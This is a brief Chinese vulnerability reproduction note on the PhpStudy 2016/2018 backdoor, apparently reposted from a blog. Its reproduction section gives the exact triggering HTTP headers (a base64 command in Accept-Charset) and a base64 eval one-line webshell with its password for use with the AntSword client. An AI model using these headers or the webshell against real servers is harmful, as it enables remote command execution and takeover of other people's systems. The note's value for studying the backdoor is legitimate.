0x01描述

Phpstudy是一款PHP调试环境的程序集成包，集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款软件一次性安装，无需配置，即装即用。由于其免费且方便的特性，在国内有着近百万的PHP语言学习者、开发者用户。

后门名称：Phpstudy后门

威胁等级：严重

影响范围：Phpstudy 2016、phpstudy2018

后门类型：C&C、命令执行

利用难度：极易

0x02复现

利用工具：中国蚁剑

phpstudy：2016 PHP-5.4.45

 

Accept-Encoding:gzip,deflate
Accept-Charset:base64加密执行的命令
一句话木马：ZXZhbCgkX1BPU1RbZ10pOw== 
密码：g

配置HTTP消息头

 

连接成功

原文：https://www.cnblogs.com/0daybug/p/11601391.html